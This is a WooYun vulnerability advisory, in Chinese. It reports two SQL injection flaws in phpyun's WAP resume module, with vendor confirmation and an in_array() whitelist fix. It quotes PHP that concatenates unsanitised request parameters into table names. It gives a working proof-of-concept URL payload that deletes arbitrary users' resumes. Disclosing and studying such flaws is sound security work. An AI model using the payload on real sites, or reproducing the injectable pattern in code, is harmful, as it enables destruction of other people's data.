当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2015-105024

漏洞标题: phpyun人才系(2015-02-03)Sql注入2枚(可删除任意简历)

相关厂商: php云人才系统

漏洞作者: JJ Fly

提交时间: 2015-04-02 11:12

公开时间: 2015-07-01 11:20

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

2人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-02: 细节已通知厂商并且等待厂商处理中
2015-04-02: 厂商已经确认,细节仅向厂商公开
2015-04-05: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-05-27: 细节向核心白帽子及相关领域专家公开
2015-06-06: 细节向普通白帽子公开
2015-06-16: 细节向实习白帽子公开
2015-07-01: 细节向公众公开

简要描述:

phpyun人才系(2015-02-03)Sql注入2枚(可删除任意简历)
无法绕过waf,也就获取不了敏感信息。

详细说明:

代码

/wap/member/model/index.class.php

code 区域
function addresume_action()//复制的较长,可直接略过。
{
if($this->config['user_enforce_identitycert']=="1")
{
$row=$this->obj->DB_select_once("resume","`idcard_pic`<>'' and `uid`='".$this->uid."'");
if($row['idcard_status']!="1")
{
$data['msg']='请先登录电脑客户端完成身份认证!';
$data['url']='index.php';
}
}
if($_GET['type']&&intval($_GET['id'])){
$nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");
if($nid)
{
$url=$_GET['type'];
$this->obj->DB_update_all("user_resume","`$url`=`$url`-1","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");
$resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_GET['eid']."'");
$this->obj->complete($resume_row);
$data['msg']='删除成功!';
}else{
$data['msg']='删除失败!';
}
$data['url']='index.php?c=addresume&eid='.(int)$_GET['eid'];

}
if($_POST['submit']){
$_POST=$this->post_trim_iconv($_POST);
if($_POST['eid']>0){
$table="resume_".$_POST['table'];
$id=(int)$_POST['id'];
$url=$_POST['table'];
unset($_POST['submit']);
unset($_POST['table']);
unset($_POST['id']);
if($_POST['syear'])
{
$_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']);
$_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']);
unset($_POST['syear']);
unset($_POST['smouth']);
unset($_POST['sday']);
unset($_POST['eyear']);
unset($_POST['emouth']);
unset($_POST['eday']);
}
if($id)
{
$where['id']=$id;
$where['uid']=$this->uid;
$nid=$this->obj->update_once($table,$_POST,$where);
}else{
$_POST['uid']=$this->uid;
$nid=$this->obj->insert_into($table,$_POST);
$this->obj->DB_update_all("user_resume","`$url`=`$url`+1","`eid`='".(int)$_POST['eid']."' and `uid`='".$this->uid."'");
$resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_POST['eid']."'");
$this->obj->complete($resume_row);
}
$nid?$data['msg']='保存成功!':$data['msg']='保存失败!';
$data['url']=$nid?('index.php?c=addresume&eid='.(int)$_POST['eid']):'';
$data['msg']=iconv('gbk','utf-8',$data['msg']);
echo json_encode($data);die;
} else{
if($_POST['name']==""){
$data['msg']='姓名不能为空!';
}else if($_POST['sex']==""){
$data['msg']='性别不能为空!';
}else if($this->config['user_idcard']=="1"&&trim($_POST['idcard'])==""){
$data['msg']='身份证号码不能为空!';
}else if($_POST['living']==""){
$data['msg']='现居住地不能为空!';
}else{
unset($_POST['submit']);
$this->obj->delfiledir("../upload/tel/".$this->uid);
$where['uid']=$this->uid;
$nid=$this->obj->update_once("resume",$_POST,$where);
if($nid){
$this->obj->update_once("member",array('email'=>$_POST['email'],'moblie'=>$_POST['telphone']),$where);
$this->obj->member_log("保存基本信息");
$data['msg']='保存成功!';
$data['url']='index.php?c=addresume';
}else{
$data['msg']='保存失败!';
$data['url']='index.php?c=addresume';
}
}
}
}
if(!$_GET['eid']&&$_POST['submit']==''){
$num=$this->obj->DB_select_once("member_statis","`uid`='".$this->uid."'");
$maxnum=$this->config['user_number']-$num['resume_num'];
$confignum=$this->config['user_number'];
if($maxnum<=0 &&$confignum!=""){
$data['msg']='你的简历数已经超过系统设置的简历数了!';
$data['url']='index.php?c=resume';
}
}else if($_GET['eid']){
$row=$this->obj->DB_select_once("resume_expect","`id`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");
include(PLUS_PATH."job.cache.php");
$job_classid=@explode(",",$row['job_classid']);
foreach($job_classid as $v){
$jobname[]=$job_name[$v];
}
$jobname=@implode(",",$jobname);
$this->yunset("row",$row);
$this->yunset("jobname",$jobname);
$skill=$this->obj->DB_select_all("resume_skill","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");
$work=$this->obj->DB_select_all("resume_work","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");
$project=$this->obj->DB_select_all("resume_project","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");
$edu=$this->obj->DB_select_all("resume_edu","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");
$training=$this->obj->DB_select_all("resume_training","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");
$cert=$this->obj->DB_select_all("resume_cert","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");
$other=$this->obj->DB_select_all("resume_other","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");
$this->yunset("skill",$skill);
$this->yunset("work",$work);
$this->yunset("project",$project);
$this->yunset("edu",$edu);
$this->yunset("training",$training);
$this->yunset("cert",$cert);
$this->yunset("other",$other);
}
$resume=$this->obj->DB_select_once("resume","`uid`='".$this->uid."'");
$this->yunset("resume",$resume);
$this->yunset("layer",$data);
$CacheArr['user'] =array('userdata','userclass_name');
$CacheArr['job'] =array('job_index','job_type','job_name');
$CacheArr['city'] =array('city_index','city_type','city_name');
$CacheArr['industry'] =array('industry_index','industry_name');
$CacheArr=$this->CacheInclude($CacheArr);
$this->waptpl('addresume');
}



这里我们可以看到 。

code 区域
$nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");





这里$_GET[‘type’]直接入库。

我们可以进行注入。



还有这个函数下面的内容

code 区域
$table="resume_".$_POST['table'];//重点、。。。。。
$id=(int)$_POST['id'];
$url=$_POST['table'];
unset($_POST['submit']);
unset($_POST['table']);
unset($_POST['id']);
if($_POST['syear'])
{
$_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']);
$_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']);
unset($_POST['syear']);
unset($_POST['smouth']);
unset($_POST['sday']);
unset($_POST['eyear']);
unset($_POST['emouth']);
unset($_POST['eday']);
}
if($id)
{
$where['id']=$id;
$where['uid']=$this->uid;
$nid=$this->obj->update_once($table,$_POST,$where);





同理的还有下面这个函数

code 区域
function addresumeson_action()
{
if($_GET['id']){
$row=$this->obj->DB_select_once("resume_".$_GET['type'],"`id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");///重点。。。。。
$this->yunset("row",$row);
}
$this->user_cache();
$this->waptpl('addresumeson');
}

漏洞证明:

如何删除任意简历。

简历在库中信息如下

图片1.png



我们来构造一下type=expect` where id=3#

Url

code 区域
http://localhost/phpyun/wap/member/index.php?c=addresume&id=1&type=expect%60%20where%20id%3D3%23





图片3.png



图片4.png

修复方案:

添加一个 in_array()

版权声明:转载请注明来源 JJ Fly@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-02 11:18

厂商回复:

感谢您的提供,我们会尽快修复!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录